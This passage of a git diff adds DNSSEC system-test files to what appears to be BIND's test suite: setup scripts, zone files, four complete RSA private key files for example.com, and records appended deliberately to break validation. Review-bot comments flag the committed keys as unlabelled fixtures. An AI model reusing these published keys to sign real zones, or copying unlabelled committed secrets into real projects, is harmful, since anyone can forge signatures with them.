+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+if "$PERL" -e 'use Net::DNS;' 2>/dev/null
+then
+ # shellcheck disable=SC2016
+ if "$PERL" -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.70);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions 0.69 to 0.70 have bugs that cause this test to fail: please update." >&2
+ exit 1
+ fi
+fi
+
+exit 0
diff --git a/bin/tests/system/dnssec/setup.sh b/bin/tests/system/dnssec/setup.sh
new file mode 100644
index 0000000..568c62b
--- /dev/null
+++ b/bin/tests/system/dnssec/setup.sh
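Review bot: The Net::DNS block in prereq.sh is skipped silently whenever `"$PERL" -e 'use Net::DNS;'` fails, including when `$PERL` is empty, because stderr is discarded and the outer `if` has no `else`. If Net::DNS is optional for this test, a comment above that `if` should say so, e.g. `# Net::DNS is optional; only reject the known-bad 0.69-0.70 releases when it is installed`. Separately, `if $PYTHON -c "import dns"` expands `$PYTHON` unquoted while both Perl checks use `"$PERL"`; `"$PYTHON"` would be consistent unless the variable is expected to carry arguments.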
@@ -0,0 +1,52 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+
+copy_setports ns4/named1.conf.in ns4/named.conf
+copy_setports ns5/named1.conf.in ns5/named.conf
+
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+
+copy_setports ns9/named.conf.in ns9/named.conf
+
+(
+ cd ns1
+ $SHELL sign.sh
+ {
+ echo "a.bogus.example. A 10.0.0.22"
+ echo "b.bogus.example. A 10.0.0.23"
+ echo "c.bogus.example. A 10.0.0.23"
+ } >>../ns3/bogus.example.db.signed
+)
+
+(
+ cd ns3
+ cp -f siginterval1.conf siginterval.conf
+)
+
+(
+ cd ns5
+ $SHELL sign.sh
+)
diff --git a/bin/tests/system/dnssec/signer/example.db.in b/bin/tests/system/dnssec/signer/example.db.in
new file mode 100644
index 0000000..3ab6aa2
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/example.db.in
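Review bot: No comment in setup.sh explains why the ns1 subshell appends three A records to `../ns3/bogus.example.db.signed` after `sign.sh` has run. Presumably the point is to leave unsigned data in a signed zone so that validation fails; a line such as `# Append unsigned records after signing so bogus.example fails validation` above the `{` would make that explicit. `$SHELL clean.sh` and `$SHELL sign.sh` also expand `$SHELL` unquoted, which is safe only if the value never contains spaces.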
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +example. 60 IN SOA example. . 0 0 0 0 0 +example. 60 IN NS example. +example. 60 IN A 1.2.3.4 +; out of zone record +out-of-zone. 60 IN A 1.2.3.4 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key new file mode 100644 index 0000000..d4b8efb --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 15002, for example.com. +; Created: 20210423012926 (Fri Apr 23 11:29:26 2021) +; Publish: 20210423012926 (Fri Apr 23 11:29:26 2021) +; Activate: 20210423012926 (Fri Apr 23 11:29:26 2021) +example.com. IN DNSKEY 257 3 8 AwEAAdp+oCXl7vpKA3Mmyndx6/iA+wLrtxeMUiWL7uWJ9ZF24EdS8Dye 63p0lGlyvjvM9T5dTiyEpTAdutEBr79H0MlDqIBqpadrCdJRI2S4kC+0 nq5+Aj2CEyiAamPGujwWeXwtfLAvVPfBqs42PBr6wPQIJOByFYDaZBU3 enUEWgHYy/7OnJDrt0QlswKphR6SvYtyuixiUR8J/WouWXglUY5qlC7Z vVDxs9E4q7B1mfKCyoqcFMKPh9lzEBH+IfUZ543xXEYf2BEztKB1SZ2R QnpYedjATGDcgPis46uA2gHMfvDYJTQ5UqTBtveGb3Wsqc0oRXVPMEoY 3WnWhaKDzkk= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private new file mode 100644 index 0000000..72b8e2e --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private 
@@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 2n6gJeXu+koDcybKd3Hr+ID7Auu3F4xSJYvu5Yn1kXbgR1LwPJ7renSUaXK+O8z1Pl1OLISlMB260QGvv0fQyUOogGqlp2sJ0lEjZLiQL7Sern4CPYITKIBqY8a6PBZ5fC18sC9U98GqzjY8GvrA9Agk4HIVgNpkFTd6dQRaAdjL/s6ckOu3RCWzAqmFHpK9i3K6LGJRHwn9ai5ZeCVRjmqULtm9UPGz0TirsHWZ8oLKipwUwo+H2XMQEf4h9RnnjfFcRh/YETO0oHVJnZFCelh52MBMYNyA+Kzjq4DaAcx+8NglNDlSpMG294ZvdaypzShFdU8wShjdadaFooPOSQ== +PublicExponent: AQAB +PrivateExponent: SD4X64/0DTONonRP+2Biej8DP7r6RcHyo1F6QtDzrg4VJ+AHaLPO/iUvsRHsTk99QwqMv3F4QMmDrHmXR3KSWQmS3Crm7M0aaTzErBfOLMfWs7EcQoQQm5KiGq1phFaWAnXzxTlRKb4SIK6T/wOr6sQKlV+DNqB++Pjn92rh67vLM8kZBUzWI14Vl9N0ib+xOOFH1oYFo7ynDgMfJhpnQSkuRfyQls3aD1eKQsNazRtZ7lFi2S0HR/V0AKYH2AQi7SdL5wH6hYba5cHfpKSw7PebI0lYkUJ4PAg3Xw7DPMkg8O0hkpLICpU8x7MPqQQ74eKDaEY+fjbL0KLL0Dy9UQ== +Prime1: /IDRb7WzMY6wp14LqDORULoUnmiQOqkRjOQnCoEXT2KVpYwPmGMG+GR40hrMFgqqAZFVmi56VBoasWpYbSBEqM4aJv1JVimMPREk23v5i+TY93kxICO/ee9/v0hXgLmrKUkS1Kwu4a1PxLX5U/LAzXPR6zF+EHP9OKFjDRWHqN0= +Prime2: 3YU9QdtsXofjNmlDETRwemKv45pa0oVNPmNvS1vtzIpQ3m/QSuhJxzyTgSP9x1XMiIsg63er3LOCtkRifXVE1IBrfIUgchp8YD5LsyesRl2ielE8Hw8PwSA1YjUVu90yRHcVfbZJ8lm2KyRKHgDWXz94t2Xnm/9M5XjUGuNW7l0= +Exponent1: 7KIkpJYZyvW4ZAFk10sMgiUBMbs4f2D2i509YUC9ga4YJD7wVpVncN1nxS9L19RCopl7KbUo+yxDm8TX/dzhu3j7VVLFqbPiM1Cfw/mZUhszoii3ezFFPpbOl4rKRl66I0TSGvEKNoDfYrBPavby7Rf/wHRveifZRXspgpeMvRk= +Exponent2: yvvtjuxW2CRiopg/+YL40lyd2cy2DpRRnKqW8BHzzGquAbWpwwopmOS8MSjewgqv2irK5pmJJTpku0nciiOsB6EJXVfLzGLSt4o96ZOf+/aPDNBla/xsLkaqRCxqlvPwvOX2DnS8O9PS5qNhOy7/QNYzcrJxUfPV7awTh/Pr040= +Coefficient: PHxU1tqPKTpI/8nABvso0SRerc1m+RPWGRk7s/SVcADSBvEW7fUDcwiZeRfK9MdlwPvLiVozbYnRbgRQl8GuKSqAD1+Cnvn2yOQk81AgNKbuKPwF7UvKIdq/c/xnhj2bvZUVSavJ91ux/RlZNP50378Ks8bj5HJl1xzAMVHXB5o= +Created: 20210423012926 +Publish: 20210423012926 +Activate: 20210423012926 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key new file mode 100644 index 0000000..990b837 
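Review bot: Kexample.com.+008+15002.private and the three other `.private` files added after it (keyids 63613, 18240 and 28633) commit complete RSA private keys to the tree, and nothing in `signer/general/` says they are fixtures. They sign only the `example.com.` test zones, so this is acceptable for a test suite, but secret scanners will flag them and a reader cannot tell them from a leak. I would add a short README in `signer/general/` stating that these keys are throwaway test material that must never be used outside the system tests, and list the directory in the scanner allow-list if the project keeps one.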
--- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key @@ -0,0 +1,5 @@ +; This is a zone-signing key, keyid 63613, for example.com. +; Created: 20210423012810 (Fri Apr 23 11:28:10 2021) +; Publish: 20210423012810 (Fri Apr 23 11:28:10 2021) +; Activate: 20210423012810 (Fri Apr 23 11:28:10 2021) +example.com. IN DNSKEY 256 3 8 AwEAAZzun7bYfjmGDwUEn4pyJG34vsiawRMW6pEdoNMH87ozxriOzgG6 /4zTjEv8JyYjGQz2k2vcoWWcD+86xD5IUqfa1pdXXUU8bdhG9DBtW/K1 mc4P6g8heU+0f++mq/L4TPlWVZUG8lVH4H8mD6r8PsVK7v/QR7wMeg9b JpCYyxon2A9rZ4zS0J9kX9bfciQVh6ODGVENctwEK5FNp5u0VonPEIx3 5Kj+IVn/mHpfbz4LaC02s7C6Kgvn3ToFFSJczwbOaexl/d+/ai8FLJi7 8UgiAq5/178bcVLItMeY6aD5eQGkRtr2c3JZ/JR4Nf+TQAWFBnl9NSDa RH4Qa55ZNqs= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private new file mode 100644 index 0000000..1765d3f --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private 
@@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: nO6ftth+OYYPBQSfinIkbfi+yJrBExbqkR2g0wfzujPGuI7OAbr/jNOMS/wnJiMZDPaTa9yhZZwP7zrEPkhSp9rWl1ddRTxt2Eb0MG1b8rWZzg/qDyF5T7R/76ar8vhM+VZVlQbyVUfgfyYPqvw+xUru/9BHvAx6D1smkJjLGifYD2tnjNLQn2Rf1t9yJBWHo4MZUQ1y3AQrkU2nm7RWic8QjHfkqP4hWf+Yel9vPgtoLTazsLoqC+fdOgUVIlzPBs5p7GX9379qLwUsmLvxSCICrn/XvxtxUsi0x5jpoPl5AaRG2vZzcln8lHg1/5NABYUGeX01INpEfhBrnlk2qw== +PublicExponent: AQAB +PrivateExponent: N4egcDzO/V/YdLgcFAsrpNY9/BH2e+DCA7NuMv4/WgX0LV4quyYGQzigDksdNzt4I8Qkiig53BCK+uXahwdkaAzhng/F6zfkzoDc6z3nKUzlLasn8U6w9Gk0VAKwGXuPETNheShKG68hWxyGssQrGfjX9SEoIPxxPHnOfZ/zTj95KAnVV5qPz90xVAb0+FUrLXAt72KuRwepOTlsETsMFDKe17uUCqCCdX98Ko0u14wrO6zGRQtNhUsfvNB/pY8fvbHD1GcCTbFSx4FxsUsZMrNtMsvMe3HN9ggC0Y9htbH9HV0hS0w9SKCUyoeOVwf/JZL4hlfoe8+jglsyJpAgoQ== +Prime1: zeXvO3PT4iXv9GlGeebl39pF1sXs8tXY4B9VHUJGGSYlyOlyCEy4URQJIPfuL6VjFKCErSxUJSrGz0HyQuKr8l9qP/0MGxGRH7wxvUR7YTmai84yyQ4fFENRmn8bzxGwj0MVHIW7cKC59j7nWT24gseT21/NP5m8EnPsjz/K40M= +Prime2: wx5vVFSydUfr8HtOHNS1kRrTjhnQOfjmj8SxGi72Hk+mgi9fBCTC5fRLifd80wGbgyFk1vZOXeStOC8L3IlnBGLX0O9MNip+vVX3hRzIRhLwHhL1ygN3xEd04qwVH0XJ8+4A0XCzh/FJgW59F62geN6gwedo7GmZAOSZUBAyRHk= +Exponent1: IlkqeLuQ7Fgx2I87b5iiXp62Keco6TXdkT4I3/GvagCgKw0utc2+rd/uye4ycQZhKg7BM3aCrxScx/STaq8PykY6nmQjgdyDXkzx60YiYwzOCGakuD+/1YyJb4Gm7PthffTN780rgNV/UGIcDBoszrxmoSExR1vpMRbfruIQgas= +Exponent2: or0Os/KUibc79W6Snv9WlLkgPAQRpViQzNaLtD/47R0Xzrs975HNsMgJ/P+bb86Ga1994MC8ahmh1BuBNCax8nmScWQ1V3QoEzjRYoe4DqIa/aposF4mFWJX/fry/wtRPo+CxSzPwJGh8j86PHaHQmjFAhVFcPE+OP1xVdK8alk= +Coefficient: r5wPmPXUF5pVC0Y7La3jVkL4w/3wvq9LBz91tH9gA8OUNLpDDBuFZISiJdhOZ4JVw+qSSoHcEa+3Phd+BqxmXzwZDU1Fqta9mLDDGCqCWjVQOopeeJgrvkv9P0TIzEuoGmW50cQhyqHYCtuUxjOnHfiQSc53p7rfD4Vom1VQ3Ok= +Created: 20210423012810 +Publish: 20210423012810 +Activate: 20210423012810 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key new file mode 100644 index 0000000..47003a4 
--- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key @@ -0,0 +1,5 @@ +; This is a zone-signing key, keyid 18240, for example.com. +; Created: 20211221062121 (Tue Dec 21 17:21:21 2021) +; Publish: 20211221062121 (Tue Dec 21 17:21:21 2021) +; Activate: 20211221062121 (Tue Dec 21 17:21:21 2021) +example.com. IN DNSKEY 256 3 10 AwEAAe5GunnuJFyzmKiGUknSQY3aPtR5UR8vNLLyMCJswffRzoYwY14/ 60ZTsqzh7N+lJV3KAOraocFSsTnmWIM7D7DPpqtaJMQw90ypBG0cnUP1 wKX9L/gdOH/ITlluBiZpCv9Aux3FRECHBO4Gx8Rse8ST2Vag3UuOPW+q HkLsWQt22K/hYuDhEtUWWx2dTIaXUVXNSNbk2zPL+lhC9PaRV+//1Fjo UX4qXCUuUN4TiqlkK2v4UkcIyld1n2R7qTQAkoN9amGFtPu8z5Zw7CxC San03yUSNuKub3fGys11gQRFuEHRX7FxKxvJjmcngG9qCh8AyfHZ8zYb VstTy1unFoM= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private new file mode 100644 index 0000000..f16b627 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private 
@@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 10 (RSASHA512) +Modulus: 7ka6ee4kXLOYqIZSSdJBjdo+1HlRHy80svIwImzB99HOhjBjXj/rRlOyrOHs36UlXcoA6tqhwVKxOeZYgzsPsM+mq1okxDD3TKkEbRydQ/XApf0v+B04f8hOWW4GJmkK/0C7HcVEQIcE7gbHxGx7xJPZVqDdS449b6oeQuxZC3bYr+Fi4OES1RZbHZ1MhpdRVc1I1uTbM8v6WEL09pFX7//UWOhRfipcJS5Q3hOKqWQra/hSRwjKV3WfZHupNACSg31qYYW0+7zPlnDsLEJJqfTfJRI24q5vd8bKzXWBBEW4QdFfsXErG8mOZyeAb2oKHwDJ8dnzNhtWy1PLW6cWgw== +PublicExponent: AQAB +PrivateExponent: U/ipDv9V4TWJvxpXNZzbbVpUehym8g54y/d97yPU17kgxzmWS0jLaWVluneEOuzAVmUyHZIfHzo9KuJ6nwTZar5DRm/mNR3siR+nZ6yF38VjtxubJB1oI+A7fFjB4hdywLHXP46dlv/+RMQu8pIorAZOubDHTDE8hXW2ZG9WkisJ5P7KoaL4KFHHHXi5vsXAMph4Zphd/zPxVL2tHD3l5c3QXRpQWfTNZNQcZ1f/4yVCuMRibg5LCvpia0ZwRrlygfZdAHUUd0VJDfRO45J5nlIJSAHQtjYtVTL+xNISWOHXovVlInkVyluACqfX94I7qPXTu41yg3SxrrtHE6RTwQ== +Prime1: +/YsRxmUxgvHKUh4SxdjzqNDDEi8b2BtM5IpctjVG3oYsL6J9xJB3U5/lbrGEPgl/1ndBUSXMQ6zQ5WcDE1qBAdW8t0eyniyuiexcgQ9f04Ds7p7oUiSHGLRn8YqQOzmiASXoZmkzfJZ+42pGhT3RZ+aYKtWQGMHqXabwV3zZl0= +Prime2: 8hhnKzPzExy6wv/MV0aYKo1g4azrRjug6743/ctTC7zjnMmDW7RMFTXmq5Tu3pFaIL4N4C4m1b7P3abfTrjm+DwHnrlRIvLWS3zJnvUEM22i4BwqqTLRiJpoT5Bfp4pVsdOPT7Iyx1q5UsJZ7Q4qMpg2TFpGiQyieRB5Xwpu4l8= +Exponent1: ZFPx7Z3SD8pA0793pu75Xx7DY/DSl8bdtNtOhdyxfu9vRXGZnjg24diQFR76H2ewOa2exKo7Sd2ApDi+mmd4/4Gsrag+yoClKlsD3VKy6i42ayqmb+Jly8fNkMFnsdKjOSYa+s4jQZ5vFiuiWjBfBeo3nqabAahtNJ12B9lRQkE= +Exponent2: tNz4TnVsFo4zFLVHsrghvECM7WxjBMBNc3FToT6CV1WRcjO1+A/Ve08eenc0kYBjpex2r1GrX6pC3uPpFoXav/8Q7kqiTArBf/nFIwUHU2iH8wf38xntIjHA1hgU7jTR2p0kBrUpbHfh1esuhYQ8kDnY7ufOpFqVEv70vcUsm98= +Coefficient: 3acDCJ9jCnHAP1km7jRO388mOpiI8U6SMv0PBD8l2UoB4CYwujrFxy6PhgUa486bbm5xZEaOwhYZcbw/g1qyC6Qt5kYOb2fVWOob/lEQmyqbDvHMQWTJoIbqaDTKQN/szI4xVdb/xZ6QR4Bq7JgbJpUACgweS540Y7Lf8Dry8C0= +Created: 20211221062121 +Publish: 20211221062121 +Activate: 20211221062121 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key new file mode 100644 index 0000000..37bd259 
--- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 28633, for example.com. +; Created: 20211221062130 (Tue Dec 21 17:21:30 2021) +; Publish: 20211221062130 (Tue Dec 21 17:21:30 2021) +; Activate: 20211221062130 (Tue Dec 21 17:21:30 2021) +example.com. IN DNSKEY 257 3 10 AwEAAc4lt8fDsdCzMCLHxXm8Ok/dw6XDiqx06Rf47LTeLmo6b64xm1Fs 0zloNMrcZDgwS5IxjQ3Breqc5aEc+jehueqCXa/fJXMdIt1VpUG0H7GP 4B+1IVmEiziHfmOozktdkuAyLqcsNhsf+J1+bCoHJSffgz6KbjBks/jR 12uyUnZCDrKGE/KfiR0gpT3watqGqqChO0KXq2N2PsnYfyRDea5FMUjM oPgOOyAT8LIMsM8x4f+EbU6m9Zc3Esafek9iLCS9R1333Pm1EEh5ghQT BsZ7omc5aSvrKUaIneojU3RdofceZouCliIDXmqscfY0y6bivGcmCQI/ LM4XUh7GWlM= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private new file mode 100644 index 0000000..6d7f72e --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private 
@@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 10 (RSASHA512) +Modulus: ziW3x8Ox0LMwIsfFebw6T93DpcOKrHTpF/jstN4uajpvrjGbUWzTOWg0ytxkODBLkjGNDcGt6pzloRz6N6G56oJdr98lcx0i3VWlQbQfsY/gH7UhWYSLOId+Y6jOS12S4DIupyw2Gx/4nX5sKgclJ9+DPopuMGSz+NHXa7JSdkIOsoYT8p+JHSClPfBq2oaqoKE7QperY3Y+ydh/JEN5rkUxSMyg+A47IBPwsgywzzHh/4RtTqb1lzcSxp96T2IsJL1HXffc+bUQSHmCFBMGxnuiZzlpK+spRoid6iNTdF2h9x5mi4KWIgNeaqxx9jTLpuK8ZyYJAj8szhdSHsZaUw== +PublicExponent: AQAB +PrivateExponent: Wr3fl99cdjFqDuVA18UzJdTIOj9I24Da2eKIz1S9uaTfZB4R8FWm5K4qDuHUe6dGnKOTI2sN0ygdLD5FJhfabo/UDYZ8RZ+dqS/5/mH7UX2zekGQ3Iargcaiq9uycxpNfMKaJpwfdPEtzqXHlvhuMo8AhpcIyeSKFAzKdm2YPtUqIrum4RARHyfRLfLyWlkIotPdyiaKCVGQxiRbFsTcmIB2Bizmt7zRjlB+Hxf8MooXmaKUFRQtMCLnFGK0ecFI1CWAxmLSanvYVKQ0HxcFkFKzRiZAz1au7ZfMgYDZj0jF72WAGU3Edcmdc0QIQRTWjb/3wcBfwlr9s6lKoF3ngQ== +Prime1: 1EIziKhz7dF41rb/hckdr2qeY8eM7tLrT5jIMPLISHCCuKm5IK2u7PY6m6NjMdhx1ilm7K2RGTt+TTFZaqDIEd8qpzRCxAGcfTVOmB9iHwmi9i9RoPSlY6o+iShft68ZnvPiGJWUF2huRYVK2F0cIWErwSqaBGsFd79mXmlkn98= +Prime2: +KEdNtZj9JyCCR2xbLAw3tnAYxHvJ3skVMjxV3cyUupMWi12NWxGhHH1nnetXxDR2LBBuqIl4pE/4MeXe3sClMHTL3Z9XG+pzQAsHS7yvsfZERdyuWZYYy0ya/7XY2auvRVO6LxN7d47VWjYxAGfoCsbCEivgDxmt1dTZhAtRA0= +Exponent1: d5TcZ69PsLoEtCLhDkRh/wO4PEqeMaaOf4d5sWn2QCly3Apyi+CN3l5SYoDIT7q7V4Z3v/uA9ZA49dBJqfLvBHKQGycsPjUSLtAreTSlGQtazguWl3F9BAtTs/4U/u0dKBoKVQNgLVfeWDhiFEdQo9WUyvzvTHHm4LHqQGJsGE0= +Exponent2: EU2dK+DVygNOZXYEkAzfCdNbuUlZPIUsbR4i9bRc8zpNIAWD8YncioEn1+R6U2BnSk5R9LwuKMt1B568YyKXdmTa3rW/WbyHs7WsXEeVK0PbTn40RMTjp9tQZAWzVb6isJQYDsh0H/bUaEhItbNrOYlmczgjxqftehsAudysWc0= +Coefficient: sl2u/8vttxpiTbspGV4SsaDmKUNdzQH7BgJ5rl3mXPp/aUpLw0Sr7FuARy8W8tq3yVNi9qCOnvGwVl6aQzZP7b8N04KiH8gewlAVdSfxG24yFKJIQNbWGKFZYZFYyjtLVlpK6NYF0f0I1KpAjn58XR0qIBvRFZYWBAkggU9C7ro= +Created: 20211221062130 +Publish: 20211221062130 +Activate: 20211221062130 diff --git a/bin/tests/system/dnssec/signer/general/bogus-ksk.key b/bin/tests/system/dnssec/signer/general/bogus-ksk.key new file mode 100644 index 0000000..e468574 --- /dev/null 
+++ b/bin/tests/system/dnssec/signer/general/bogus-ksk.key @@ -0,0 +1,6 @@ +; +; This is a bogus key. It will not have a .private file. +; +; This will be key id 23221 +; +example.com. IN DNSKEY 257 3 10 AwEAAbcyptpM++pVjhpYQW2fVtyOw04IBSw4X0SYi/Ke4wVkmDNW2vBm AFkgiVVKmmNbb0IHDYQiIY7seXk0fjEwjzeY2bmeOAZxDdv2KT9VQpoY Matk2y4NTi6F/V04x0lL/CBvyifTeNbZKvY+S1eKFuWHeS5Ss8tiagz9 zdYWUe/msvmin+Hbs2tlLwXVl4hOmABCL9uK9H8R6GPL5VdEXYyFOh/v 71CNhRU5ufrARti69YYkfzH6NpWhlJWyJvDjqAdt2L3H8V71C2vcXbBu S5NscEYl+8JQfwUvOTN553I5IQrG+NQEusW36UM/Rkad8mMnUVM9Vzqk GH86GHKtLMc= diff --git a/bin/tests/system/dnssec/signer/general/bogus-zsk.key b/bin/tests/system/dnssec/signer/general/bogus-zsk.key new file mode 100644 index 0000000..aa45938 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/bogus-zsk.key @@ -0,0 +1,6 @@ +; +; This is a bogus key. It will not have a .private file. +; +; This will be key id 48930 +; +example.com. IN DNSKEY 256 3 10 AwEAAa/0IcnbGutPVkrz04tw5ZIYx6rU+FprB2rlKS8cTK/wiBOqbOC6 QIDdegDpZG1fOdj04ZQGa3pIizqC2CnlIWfxpfR6W+qSLRBuQ8gmwTmS c/Jy/0vAGB3fv3oVIqKslLNqIXZb3CKNiA2kGcut3aUgfeOW970Jga6z PAGKqPpPZTelW1Qy9N5BO4cRTuYo4uvbZveJv1W/2n5RN+UaeqU0f+AE DP0+wqSWNUfZsi6HygLwk08x3eO8PzTBlqBlAMfvNAygrmXqccMREyyH KEc5dVJ1qOXfj8BAdJUPmunyJhIwC9PxzOW7mn1lW7mZO2D5U/Jaxw2k eX2KblmVk8s= diff --git a/bin/tests/system/dnssec/signer/general/test1.zone b/bin/tests/system/dnssec/signer/general/test1.zone new file mode 100644 index 0000000..98c9f02 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test1.zone 
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has two DNSKEY records, both of which have
+; existing private key files available. They should be loaded automatically
+; and the zone correctly signed.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+18240.key
+$include Kexample.com.+010+28633.key
diff --git a/bin/tests/system/dnssec/signer/general/test2.zone b/bin/tests/system/dnssec/signer/general/test2.zone
new file mode 100644
index 0000000..97c0d3d
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test2.zone
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has one non-KSK DNSKEY record for which the
+; private key file exists. It should be loaded automatically and the zone
+; correctly signed.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+18240.key
diff --git a/bin/tests/system/dnssec/signer/general/test3.zone b/bin/tests/system/dnssec/signer/general/test3.zone
new file mode 100644
index 0000000..bf9bc66
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test3.zone
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has one KSK DNSKEY record for which the
+; private key file exists. It should be loaded automatically. As there
+; is no non-KSK DNSKEY the resulting zone should be rejected.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+28633.key
diff --git a/bin/tests/system/dnssec/signer/general/test4.zone b/bin/tests/system/dnssec/signer/general/test4.zone
new file mode 100644
index 0000000..9f05de5
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test4.zone
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has three DNSKEY records, two (KSK + ZSK) of
+; which have existing private key files available. The third is a
+; pre-published ZSK.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+18240.key
+$include Kexample.com.+010+28633.key
+$include bogus-zsk.key
diff --git a/bin/tests/system/dnssec/signer/general/test5.zone b/bin/tests/system/dnssec/signer/general/test5.zone
new file mode 100644
index 0000000..d61504f
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test5.zone
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has three DNSKEY records, two (KSK +ZSK) of which
